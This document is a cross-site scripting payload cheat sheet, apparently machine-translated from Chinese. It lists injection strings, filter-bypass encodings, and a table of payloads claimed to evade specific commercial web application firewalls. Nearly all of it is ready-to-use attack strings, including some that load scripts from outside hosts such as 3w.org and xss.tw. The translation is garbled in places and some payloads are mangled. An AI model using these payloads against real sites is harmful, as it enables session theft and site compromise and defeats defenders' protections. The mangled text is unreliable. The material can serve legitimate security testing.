A: normal configuration mode:
1, no filter, write directly to:
<script>alert(1)</script>
2, the normal cut-off:
"> <script>alert(1)</script>
'> <script>alert(1)</script>3, do not <> angle brackets:
" onmouseover=alert(1) 空格
' onmouseover=alert(1) 空格
' onclick=alert(1) 空格
" onfocus=alert(1) autofocus="4, injection inline frames:
"><iframe src=javascript:alert(1)>
5, hyperlinks injection:
"> <a href="javascript:alert(1)">漏洞</a>
6, alert (1) in parentheses: Anti single quotes available alternatives: `; can also be used /
7, when () is inverse filtered with single quotation marks, may be used as follows:
- <iframe srcdoc="<script>parent.alert(1)</script>"
- <svg><script>alert(1)</script>8, there is a comment character, it can be used , or <! -! -> bypassed
9, str_replace () function is a case-sensitive
10, when you can use the URL blacklist coding, etc. encoding:
javascript:alert(1)、javascript:alert'1'
11 may be utilized comment symbol (//) and the line feed / carriage return (% 0a /% 0d) bypassing the predetermined various ways (such as adding certain parameters must not enter a space, or the like)
12, outside the chain xss script:
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
13, IMG tag type:
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=java(16进制编码)XSS')>14, inlays:
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">(嵌入式编码标签)
<IMG SRC="javascript:alert('XSS');">(嵌入式换行符)(嵌入式回车)15, double open parenthesis:
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
16, BODY picture:
<BODY BACKGROUND="javascript:alert('XSS')">
17、IMG Dynsrc:
<IMG DYNSRC="javascript:alert('XSS')">
IMG Lowsrc:
<IMG LOWSRC="javascript:alert('XSS')">18、DIV background-image:
> <DIV STYLE="background-image:url(javascript:alert('XSS'))">19, javascript links:
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>20、embed:
<embed src="javascript:alert(1)">
21、video:
<video onerror="alert(1)">
22, in JavaScript can be Unicode escapes, hexadecimal and octal escape. In addition, a string of redundant escaped string will be ignored.
<script>a \u006cert(1) ;</script>
<script>eval(‘ a\u006cert(1) ’);</script>
<script>eval(‘ a\x6cert(1) ’);</script>
<script>eval(‘ a\154ert(1) ’);</script>
<script>eval(‘ a\1\ert\(1\) ’);</script>Two: to bypass mode
1, double url encoding
the url encoding% to 25%, if the parameters of the background again decode url or url decode output when there will bypass WAF.
2, base64 encoding the
WAF does not block <>, but the intercept script onXXXX, in base64 bypassed.
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">3, HTML entity encoding bypass
(1) Explanation: a solid start coding in order to avoid such double quotes in your sister label data to be entered in quotation marks cause the browser to put quotation marks as you type on a quote and abnormal closed and raised.
payload:
<a href='javascript:alert('123')'>hello</a>
<a href="javascript:alert('123')">hello</a>Tip:
(2) In fact, the pseudo protocol js code tag, and can not use double quotation marks.
After adding the eval function (eval know \ x hex octal \ u unicode encoding)
<a href="javascript:eval('&#;\u0091\x65\x72\x74\x28\x22\x31\x22\x29')">hello</a>(3) If the page is displayed directly typing, you can html coding, then url encoded.
<svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
4, the filter / script
<%2fscript>
<%252fscript>
<%252fScRipt>
<%252fScrIPt%20>
<%252fsCrIpt+ipT%20>5, the filter bracket
when the bracket can be used when the filter is used to bypass the throw:
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">6, bypassing the use of byte 0
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>7, a combination of the first split and then
<script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>
8 by bypassing the encoding ascii
<img/ \/\μ src=x onerror=alert(1)//>
<img src=\x17\x17 onerror=alert(1)//>
<img/\%20src=%17y%17 onerror=%C2%A0alert(1)//>9, filter brackets and semicolons
you can use curly braces to isolate statement, the overall onerror put braces. This avoids the use of a semicolon:
<script>{onerror=alert}throw 1337</script>
Three: Common waf bypass
WAF名称:Cloudflare
Payload:<a”/onclick=(confirm)()>click
绕过技术:非空格填充
WAF名称:Wordfence
Payload:<a/href=javascript:alert()>click
绕过技术:数字字符编码
WAF名称:Barracuda
Payload:<a/href=Java%0a%0d%09script:alert()>click
绕过技术:数字字符编码
WAF名称:Akamai
Payload:<d3v/onauxclick=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理器以及函数调用混淆
WAF名称:Comodo
Payload:<d3v/onauxclick=(((confirm)))“>click
绕过技术:黑名单中缺少事件处理器以及函数调用混淆
WAF名称:F5
Payload:<d3v/onmouseleave=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理器以及函数调用混淆
WAF名称:ModSecurity
Payload:<details/open/ontoggle=alert()>
绕过技术:黑名单中缺少标签或事件处理器
WAF名称:dotdefender
Payload:<details/open/ontoggle=(confirm)()//